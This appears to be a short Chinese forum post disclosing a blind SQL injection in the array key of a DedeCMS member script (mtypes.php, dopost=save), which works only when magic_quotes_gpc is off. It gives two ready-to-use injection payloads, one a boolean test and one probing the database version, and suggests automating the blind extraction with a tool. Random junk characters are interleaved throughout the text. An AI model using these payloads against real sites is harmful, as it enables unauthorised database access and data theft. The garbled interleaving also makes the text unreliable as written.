需要magic_quotes_gpc = Off,所以说是鸡肋啊. @+ `2 D$ o$ Y) b
/ Q E" M) W/ Q' q" E p0 n
: m6 {* b! b9 B; k
发生在数组key里的注射漏洞,有点意思." _ _: p5 z& |! U l. s3 N. y. g
1 { c, K2 Z3 b0 G& a. j( D这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
% n+ F+ X) U& |1 V- G, H" |
@9 O$ ^2 W; x Q6 b) Qhttp://www.xxx.com /dede/member/mtypes.php?dopost=save' U2 ~9 o3 ]" p5 Q d+ w
' `& _1 i! { m8 ^/ }
exploit:1 A- l6 I6 f/ j. o
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r% A& q3 I+ L( y; l/ V
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
* p0 D- m" Y" ]5 o" N |